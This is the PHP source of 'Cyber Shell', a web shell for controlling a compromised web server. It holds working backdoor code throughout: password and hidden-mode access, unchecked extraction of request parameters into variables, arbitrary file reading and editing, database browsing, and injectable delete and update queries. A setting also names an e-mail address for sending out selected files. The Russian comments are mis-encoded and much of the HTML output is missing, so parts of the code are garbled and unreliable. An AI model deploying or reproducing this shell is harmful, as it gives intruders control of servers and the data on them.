/***************************************************************************
* Cyber Shell (v 1.0)
* -------------------
* copyright : (C) Cyber Lords, 2002-2006
* email : pixcher@mail.ru
*
* http://www.cyberlords.net
*
* Coded by Pixcher
* Lite version of php web shell
***************************************************************************/
/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License', or
* ('at your option) any later version.
*
***************************************************************************/
@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@error_reporting(0);
/****************************** Options ************************************/
#ïàðîëü íà àâòîðèçàöèþ
$aupassword="test";
#åñëè ïàðîëü óñòàíîâëåí ïðè $hiddenmode="true", òî ê ñêðèïòó íóæíî îáðàùàòüñÿ ñ ïàðàìåòðîì pass=ïàðîëü , íàïðèìåð shell.php?pass=mysecretpass
$hiddenmode="false";
#e-mail íà êîòîðûé ñêèäûâàþòñÿ âûáðàííûå ôàéëû
$email="test@mail.ru";
/***************************************************************************/
$style="
";
foreach($_POST as $key => $value) {$$key=$value;}
foreach($_GET as $key => $value) {$$key=$value;}
if (isset($_GET[imgname]))
{
$img=array(
'dir'=>
'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
'txt'=>
'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
'bg'=>
'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
'file'=>
'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
);
@ob_clean();
header("Content-type: image/gif");
header("Cache-control: public");
header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
header("Cache-control: max-age=".(60*60*24*7));
header("Last-Modified: ".date("r",filemtime(__FILE__)));
echo base64_decode($img[$imgname]);
die;
}
if ($_GET[pass]==$aupassword)
{
$_SESSION[aupass]=md5($aupassword);
}
if ($hiddenmode=="false")
if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
{
$diz="ok";
echo "
$style
";
if (count($dirs)==0 && count($files)==0){
echo <<< EOF
Ïàïêà ïóñòà
EOF;
}}
$edit=$_REQUEST[edit];
if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
if (filesize($edit) > 0)
$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
else $tfile = "";
fclose($file);
$tfile = htmlspecialchars($tfile,ENT_QUOTES);
echo "
";
echo "";
echo "
";
echo "";
}
if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
echo "hello";
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
mysql_query("delete from $mtable where $pixidname='$pixid'");
echo "";
}
if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
}
if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
mysql_select_db($dbname) or die("Íå ìîãó âûáðàòü áàçó äàííûõ");
$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
$res=mysql_fetch_array($re);
$text=untag($res[$var]);
echo "
Âåðíóòüñÿ ê ñïèñêó
";
}
if (isset($showdb) && empty($showtables)){
$re=mysql_query("show databases");
echo "
";
}
if (isset($showtables) and !empty($showtables)){
if (isset($xlimit)){
$_SESSION[limit]=$xlimit;
if (isset($xlenth))
$_SESSION[lenth]=$xlenth;
else $_SESSION[lenth]="";
}
echo "Íàçàä ê ñïèñêó ÁÄ";
$re=mysql_query("SHOW TABLES FROM $showtables");
echo "